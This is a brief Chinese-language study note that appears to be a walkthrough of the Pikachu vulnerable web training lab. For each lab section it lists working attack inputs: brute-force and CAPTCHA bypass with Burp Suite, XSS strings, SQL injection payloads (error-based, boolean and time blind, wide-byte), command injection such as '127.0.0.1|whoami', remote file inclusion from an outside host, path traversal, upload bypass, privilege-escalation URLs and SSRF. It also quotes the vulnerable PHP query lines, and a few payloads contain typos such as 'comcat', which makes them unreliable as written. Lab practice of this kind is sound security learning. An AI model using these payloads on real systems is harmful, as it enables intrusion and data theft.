
	https://www.freesion.com/article/3203630825/
	
	https://blog.csdn.net/brotheryy/article/details/106923848

1、暴力破解
	1.1 基于表单的暴力破解
		burpsuite
			$sql = "select * from users where username=? and password=md5(?)";
			
	1.2 验证码绕过(on server)
		burpsuite repeater
	1.3 验证码绕过(on client)
		burpsuite repeater
	1.4 验证码绕过(token 防爆破)
		burpsuite 递归搜索
			
2、Cross-Site Scripting-XSS
	2.1 反射型(get)
		<script>alert(1)</script>
	2.2 反射型(post)
		<script>alert(1)</script>
	2.3 存储型xss
		<script>alert(1)</script>
	2.4 DOM型xss
		<a href="<script>alert(1)</script>" class="link-instanted">what do you see?</a>
			' onclick="alert(1)" >
				<a href="" onclick="alert(1)" class="link-instanted">'&gt;what do you see?</a>
	2.5 DOM型xss-x
		' onclick="alert(1)" >
	2.6 XSS之盲打
		<script>alert(1)</script>
	2.7 XSS之过滤
		<ScriPT>alert(1)</ScriPT>
	2.8 xss之htmlspecialchars
		'onclick='alert(1)'  
	2.9 xss之href输出
		javascript:alert(1)
	2.10 xss之js输出
		'</script><script>alert(1)</script>
		
3、CSRF
	3.1 CSRF(get)
		get
	3.2 CSRF(post)
		伪造网站, post.html
	3.3 CSRF(token)
	
4、Sql Inject(SQL注入)
	4.1 数字型注入(post)
		id=1 or 1=1
			$query="select username,email from member where id=$id";
			 
	4.2 字符型注入(get)
		vince' or 1=1 -- +
			$query="select id,email from member where username='$name'";
			 
	4.3 搜索型注入
		*' or 1=1#
			$query="select username,id,email from member where username like '%$name%'";
			
	4.4 xx型注入(这是？？？？)
		')or 1=1#
			$query="select id,email from member where username=('$name')";
			
	4.5 insert/update注入
		注册的提交 xxx' or updatexml(1,concat(0x7e,database()),0) or '
			$query="update member set sex='{$getdata['sex']}',phonenum='{$getdata['phonenum']}',address='{$getdata['add']}',email='{$getdata['email']}' where username='{$_SESSION['sqli']['username']}'";
			   
	4.6 delete注入
		get ?id=111+or+updatexml(1,comcat(0x7e,database()),0)
			$query="delete from message where id={$_GET['id']}";
				 
	4.7 http头注入
		User-Agent: '
			$query="insert httpinfo(userid,ipaddress,useragent,httpaccept,remoteport) values('$is_login_id','$remoteipadd','$useragent','$httpaccept','$remoteport')";
	
	4.8 基于boolian的盲注
		kobe' and ascii(substr(database(),1,1))=112#
			$query="select id,email from member where username='$name'"; 不返回错误信息
			
	4.9 基于time的盲注
		kobe' and if ((substr(database(),1,1))='a',sleep=(5),null)#
			$query="select id,email from member where username='$name'"; 不返回错误信息
			
	4.10 宽字节注入
		1%df' or 1=1#
			$query="select id,email from member where username='$name'"
			$set = "set character_set_client=gbk";

5、RCE
	5.1 exec "ping"
		127.0.0.1|ifconfig
		127.0.0.1|whoami
			$result.=shell_exec('ping -c 4 '.$ip);
			
	5.2 exec "eval"
		phpinfo();
			if(@!eval($_POST['txt'])){}
		
6、file include
	6.1 file include(local)
		http://1.117.162.201/pikachu/vul/fileinclude/fi_local.php?filename=../../../index.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
	6.2 file include(remote)
		http://1.117.162.201/pikachu/vul/fileinclude/fi_local.php?filename=http://www.xiaoxiaoran.com/1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
		
7、unsafe filedownload（不安全的文件下载）
	GET /pikachu/vul/unsafedownload/execdownload.php?filename=kb.png HTTP/1.1
	GET /pikachu/vul/unsafedownload/execdownload.php?filename=../unsafedownload.php HTTP/1.1
		
8、unsafe upfileupload（文件上传）
	8.1 client check(客户端check)
		<input class="uploadfile" type="file" name="uploadfile" onchange="checkFileExt(this.value)">
		<input class="uploadfile" type="file" name="uploadfile" onchange="">
	8.2 client check(Mime type)
		Content-Type: application/octet-stream
		Content-Type: jpeg/jpg
	8.3 getimagesize
		
	
9、Over Permission
	9.1 水平越权
		GET /pikachu/vul/overpermission/op1/op1_mem.php?username=lili&submit=%E7
		GET /pikachu/vul/overpermission/op1/op1_mem.php?username=kobe&submit=%E7
	9.2 垂直越权
		http://1.117.162.201/pikachu/vul/overpermission/op2/op2_admin_edit.php
		http://1.117.162.201/pikachu/vul/overpermission/op2/op2_user.php
		
10、目录遍历
	http://1.117.162.201/pikachu/vul/dir/dir_list.php?title=../../../index.php
	
11、敏感信息泄漏
	 <!--测试账号:lili/123456-->
	 
12、PHP反序列化
	O:1:"S":1:{s:4:"test";s:29:"<script>alert(1)</script>";}
	
13、XXE
14、URL重定向
	1.117.162.201/pikachu/vul/urlredirect/urlredirect.php?url=i
	1.117.162.201/pikachu/vul/urlredirect/urlredirect.php?url=https://www.baidu.com
	
15、SSRF
	15.1 ssrf(curl)
		http://1.117.162.201/pikachu/vul/ssrf/ssrf_fgc.php?file=http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info2.php
	15.2 ssrf(file_get_content)
		http://1.117.162.201/pikachu/vul/ssrf/ssrf_fgc.php?file=http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info2.php
		
		
		
		
		
		